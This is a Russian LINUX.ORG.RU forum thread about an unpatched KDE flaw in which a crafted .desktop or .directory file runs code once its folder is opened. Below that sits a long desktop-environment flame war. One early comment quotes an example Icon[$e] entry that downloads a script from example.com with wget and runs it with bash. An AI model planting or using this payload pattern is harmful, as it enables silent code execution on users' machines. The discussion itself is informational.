LINUX.ORG.RU

Незакрытая уязвимость в KDE

 , , kdesktopfile,


1

2

Исследователь Dominik Penner опубликовал незакрытую уязвимость в KDE (Dolphin, KDesktop). Если пользователь откроет директорию, где содержится специально сконструированный файл чрезвычайно простой структуры, код из этого файла будет выполнен от имени пользователя. Тип файла определяется автоматически, поэтому основное содержание и размер файла может быть любым. Однако требуется, чтобы пользователь самостоятельно открыл директорию файла. Причиной уязвимости называется недостаточное следование спецификации FreeDesktop разработчиками KDE.

>>> Подробности



Проверено: anonymous_incognito ()
Последнее исправление: mithron (всего исправлений: 7)

Речь о файлах .desktop и .directory. Пример:

[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)


РЕШЕТО!

Deleted
()
Ответ на: комментарий от Deleted

Феерично. «О сколько нам бэкдоров чудных готовит Интернета век!»

Deleted
()
Ответ на: комментарий от jtad

а в винде тоже была уязвимость, когда иконки исполнялись. BUG-TO-BUG compatibility!

anonymous
()
Ответ на: комментарий от jtad

Разве, это вроде гном стремится быть максимально простым. Кеды можно настроить как угодно.

Dieter ★★★
()
Ответ на: комментарий от Lokidrow

*Ушёл удалять кеды*

Я надеюсь пошел прямо с гитхаба удалять?

anonymous
()
Ответ на: комментарий от jtad

Кде ставят в основном виндузятники, которые любят чтобы линух был похож на винду

Как будто что-то плохое

tiinn ★★★★★
()
Ответ на: комментарий от Deleted

Еще одна винда не нужна. Уже есть единственная-неповторимая - наслаждайся.

Единственная-неповторимая осталась в 2000 году. Всё остальное приходится допиливать напильником, чтобы хоть немного походило на Win2K. Дисяточку, кстати, уже невозможно так допилить, увы.

tiinn ★★★★★
()
Ответ на: комментарий от jtad

Кде ставят в основном виндузятники, которые любят чтобы линух был похож на винду

До определённого момента Гном был был предпочтительнее экспиподобного КДЕ. Потом всё превратилось в Яблоко. Причём обгрызанное со всех сторон. Не надо валить на потребляющих Винду свои косяки :)

anonymous
()
Ответ на: комментарий от Deleted

а другие DE, использующие эти .desktop файлы, таким не грешат?

bvn13 ★★★★★
()
Ответ на: комментарий от jtad

Кде ставят в основном виндузятники, которые любят чтобы линух был похож на винду

KDE ставят те, кому надо работать, а не страдать. Если Линух не похож на венду - он похож на говно ( Gnome ).

Alve ★★★★★
()
Ответ на: комментарий от Alve

Просто не представляю каких функций тебе не хватает, например, в Thunar?

Если Линух не похож на венду - он похож на говно

Linux не для эстетствующих хлюпиков виндузятников. А уж брать пример с винды так вообще последнее дело. Как же меня достает ее самодеятельность - когда начинает пытаться показывать теги и колонки, основываясь на содержимом, о чем ее не просили. И ведь не отключается полностью это поведения (а еще есть диалоговые окна открыть/сохранить, от Explorer не убежать).

anonymous
()
Ответ на: комментарий от jtad

А что ставить-то?
Гном? Потом пилить его напильниками кучу времени, нафиг надо.
Крыса полудохлая, там и подавно ничего не исправляется.
Придумал, Корицу можно поставить, ладно.

Ros ★★★★
()
Последнее исправление: Ros (всего исправлений: 1)
Ответ на: комментарий от Alve

KDE ставят те, кому надо работать

Толсто.

Если Васян-дистромейнтейнер не приготовит тебе кеды (по своему разумеется вкусу) - оно будет неюзабельным говном. Впрочем как и Gnome.

Только вот Gnome минимально готов к работе, а все остальное ты можешь настроить из единого центра управления с понятными иконками и названиями инструментов. В отличие от KDE, где тема рабочего стола, тема виджетов или как там называются кнопки тема оформления окон, и тема оформления приложений - четыре разные темы с настройкой в разных местах.

windows10 ★★★★★
()
Ответ на: комментарий от Ros

Крыса полудохлая, там и подавно ничего не исправляется. Придумал, Корицу можно поставить, ладно.

Крыса живее всех живых, а релизится редко именно потому что там все просто работает. Что тебе не хватает в Крысе того, что есть в других DE кроме говносервисов типа nepomuk'ов и прочей ерунды ? Концепция десктопа не менялась со времен Чикаги - панель задач, трей, главное меню с программами, десктоп и окна с заголовком и элементами управления. Всьо.

Но и Cinnamon тоже не плох. Всяко лучше сабжа.

windows10 ★★★★★
()
Ответ на: комментарий от windows10

А «минимально готов к работе» наверно потому, что в гноме толком все равно тему нельзя поменять. Нельзя поменять тему - никто и не будет об этом думать - все сразу пойдут работать - профит. С кедами то так не проканает да

anonymous
()
Ответ на: комментарий от Ros

Крыса полудохлая, там и подавно ничего не исправляется.

Ох лол, 11 августа релиз, напоминаю.

Deleted
()
Ответ на: комментарий от anonymous

Просто не представляю каких функций тебе не хватает, например, в Thunar?

Лично мне не хватает приблизительно... всего. Ну, это если сравнивать с Directory Opus ли Xyplorer, конечно. Но на фоне остальных линуксовых файловых менеджеров Thunar настолько неплох, что я именно его и использую повседневно. Просто это говорит не о том, как хорош Thunar, а о том, что ни один линуксовый файл-менеджер и рядом не стоял с Directory Opus/Xyplorer.

Kzer-Za
()
Ответ на: комментарий от Alve

KDE ставят те, кому надо работать, а не страдать.

Ох лол, да этим в дефолтном состоянии пользоваться то и невозможно. Что за чушь?

anonymous
()
Ответ на: комментарий от Kzer-Za

Но на фоне остальных линуксовых файловых менеджеров Thunar настолько неплох, что я именно его и использую повседневно

На фоне наименее функциональных или что?

Не совсем понял прикол. Тем более после упоминания Directory Opus и Xyplorer.

neocrust ★★★★★
()
Ответ на: комментарий от tiinn

Единственная-неповторимая осталась в 2000 году. Всё остальное приходится допиливать напильником, чтобы хоть немного походило на Win2K. Дисяточку, кстати, уже невозможно так допилить, увы.

Win2k нервно курит в сторонке по сравнению с божественной XP, семера еще ничего, а дальше и в правду пошел треш и угар. Я как заядлый виндузятник это тебе говорю!

vasya_pupkin ★★★★★
()
Ответ на: комментарий от Kzer-Za

а о том, что ни один линуксовый файл-менеджер и рядом не стоял с Directory Opus/Xyplorer.

файл менеджер — простая программа. напиши, а мы посмотрим как ты thunar удалаешь

одни болтуны кругом

pihter ★★★★★
()
Ответ на: комментарий от vasya_pupkin

Win2k нервно курит в сторонке по сравнению с божественной XP, семера еще ничего, а дальше и в правду пошел треш и угар. Я как заядлый виндузятник это тебе говорю!

а почему МСы не приделают возможность ДЕшку от ХР(или типа того) использовать на новых виндах? Ну этим же пользоваться невозможно! Хрен где че найдешь, хрен чего сможешь. 20 лет за компом сижу, а на винду смотрю теперь как баран на новые ворота

pihter ★★★★★
()
Ответ на: комментарий от vasya_pupkin

Win2k нервно курит в сторонке по сравнению с божественной XP

Круглые углы окон? Всплывающее окно авторана? Сами ешьте вашу заливную рыбу!

tiinn ★★★★★
()
Ответ на: комментарий от jtad

Нет; ваше мнение однобоко, если не сказать вредно и красноречиво говорит о вашем знакомстве с миром свободного прикладного ПО. Зачем мне графическое окружение, которое неспособно работать графически с большей частью железа и софта, которое я использую, при этом съедая половину ресурсов как гном и xfce? Mate был бы хорош, если бы не устарел - а рано или поздно его забросят, lxqt тоже неплохое окружение, но малофункциональное и требует долгой настройки, чтобы эмулировать уровень доступности предлагаемый кедами. Вам не нравится желание сэкономить свое рабочее и личное время?

mazdai ★★★
()
Ответ на: комментарий от pihter

а почему МСы не приделают возможность ДЕшку от ХР(или типа того) использовать на новых виндах? Ну этим же пользоваться невозможно! Хрен где че найдешь, хрен чего сможешь. 20 лет за компом сижу, а на винду смотрю теперь как баран на новые ворота

1. 7+ Taskbar Tweaker - поможет сделать область уведомления лкассической. ПКМ - закрыть, развернуть, свернуть, а не shift+ПКМ. 2. Explorer++ - привычный на внешний вид файловый менеджер. 3. Classcic shell - привычное каскадное меню пуск. 4. Замену explorer.exe для 10-ки тоже где-то находил. Не благодари.

anonymous
()
Ответ на: комментарий от mazdai

Mate был бы хорош, если бы не устарел - а рано или поздно его забросят.

Не забросят, пока его используют во всех дружественных дистрибутивах.

lxqt тоже неплохое окружение, но малофункциональное и требует долгой настройки, чтобы эмулировать уровень доступности предлагаемый кедами.

Каких именно настроек тебе требуется? Настроек там минимум, поэтому не понимаю. Можешь в гитхаб им реквест написать. Ярлыки ПК, Доки, Корзину в новой версии запилили по просьбе. TDE тоже хорош, разве что на QT3.

anonymous
()
Ответ на: комментарий от anonymous

Не благодари

Спасибо )

Но я не собираюсь этим пользоваться. Еще линуксоводов красноглазыми обзывают )

Для меня весь процесс настройки ДЕ после установки: это я в крысе перетаскиваю панель задач сверху вниз и получается классический виндовый интерфейс, который все знают и умеют. по крайней мере я

pihter ★★★★★
()
Ответ на: комментарий от mazdai

Mate был бы хорош, если бы не устарел

устарел не mate, а устарела мода на предсказуемость, простоту, практичность, эргономику и удобство.
для маргиналов, которым это всё ещё нужно, mate нисколько не «устаревает».

mos ★★☆☆☆
()
Ответ на: комментарий от jtad

Ставить этот изврат? Нет уж. Лучше Цитрамон.

anonymous
()
Ответ на: комментарий от jtad

Jawohl! Я, на данный момент, пользователь KDE. С Windows, как домашней системой, распрощался году в 2001, до этого в дуалбуте был где-то с 1997-1998.

h4tr3d ★★★★★
()
Ответ на: комментарий от mos

Я пользуюсь им на старом компьютере и в итоге вынужден держать gtk2, gtk3, qt4, qt5 библиотеки, темы и настройки в совместимом состоянии - а пользователям TDE еще и qt3 к тому же.. или выбирать софт не по тому, насколько хорошо он подходит к задаче, а по тулкиту. или статически линковать то что не вписалось

mazdai ★★★
()
Ответ на: комментарий от pihter

а почему МСы не приделают возможность ДЕшку от ХР(или типа того) использовать на новых виндах? Ну этим же пользоваться невозможно! Хрен где че найдешь, хрен чего сможешь. 20 лет за компом сижу, а на винду смотрю теперь как баран на новые ворота

Проблема точно в Винде?;) У людей помоложе обычно проблем не возникает)

meliafaro ★★★★★
()
Ответ на: комментарий от mazdai

Вам не нравится желание сэкономить свое рабочее и личное время?

Конечно, поэтому я и использую Гном.

meliafaro ★★★★★
()
Ответ на: комментарий от anonymous

1. 7+ Taskbar Tweaker - поможет сделать область уведомления лкассической. ПКМ - закрыть, развернуть, свернуть, а не shift+ПКМ. 2. Explorer++ - привычный на внешний вид файловый менеджер. 3. Classcic shell - привычное каскадное меню пуск. 4. Замену explorer.exe для 10-ки тоже где-то находил. Не благодари.

1. Костыли. 2. Инвалидка. 3. Медицинская утка. 4. Вставная челюсть. Не благодари.

meliafaro ★★★★★
()
Ответ на: комментарий от meliafaro

а почему МСы не приделают возможность ДЕшку от ХР(или типа того) использовать на новых виндах? Ну этим же пользоваться невозможно! Хрен где че найдешь, хрен чего сможешь. 20 лет за компом сижу, а на винду смотрю теперь как баран на новые ворота

Проблема точно в Винде?;) У людей помоложе обычно проблем не возникает)

Нет, не точно )

да и у меня, наверное, не возникло бы, если бы я им пользовался.

pihter ★★★★★
()
Ответ на: комментарий от h4tr3d

Ну я и не говорю что плох. Я им пользуюсь)

mos ★★☆☆☆
()
Ответ на: комментарий от jtad

Кде ставят в основном виндузятники, которые любят чтобы линух был похож на винду

А Винда похожа на OS/2 PM, поэтому Винду ставят в основном полуосники, которые любят, чтобы линюх был похож на Полуось.

Боги, это даже не поколение ЕГЭ, это поколение дегенера-ов...

GluckMan ★★★
()
Ответ на: комментарий от GluckMan

Это ты как раз бред написал, а на счет кде доля правды в этом есть.

anonymous
()
Ответ на: комментарий от GluckMan

при чем тут ось времен маммонта и люди приходящие в линух с современной винды? Я не поколение вашего егэ, я 73 года рождения, имею образование fachinformatiker и работал одно время админом. Это еще большой вопрос кто тут дегенерат

jtad
()
Ответ на: комментарий от GluckMan

Винда похожа на OS/2

OS/2 похожа на Mac OS хотя бы верхней панелью.

anonymous
()
Ответ на: комментарий от GluckMan

Кеды всегда очень похожи на актуальную винду. Меняется лукнфил винды, тут же меняются и кеды. Виндузятникам там уютно, понятное дело. Все бы ничего, но кеды это же глюкодром уровня вин98. Нормальный человек не будет в таком окружении работать, либо вернется на винду, либо поищет что получше. Остаются только дуалбутчики и старые заскорузлые утята (некоторые даже сидят на третьекедах).

bread
()
Ответ на: комментарий от bread

alexferman по твоему не нормальный человек? Он ведь даже Manjaro пользуется, в лучших традициях мышевозника.

глюкодром

И жирнота. Я помню у KDE4 фризы на десятки секунд после загрузки. Хотя удобные, да. А четвертокеды еще и страшные были как черт и дубовостью интерфейса веяло.

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.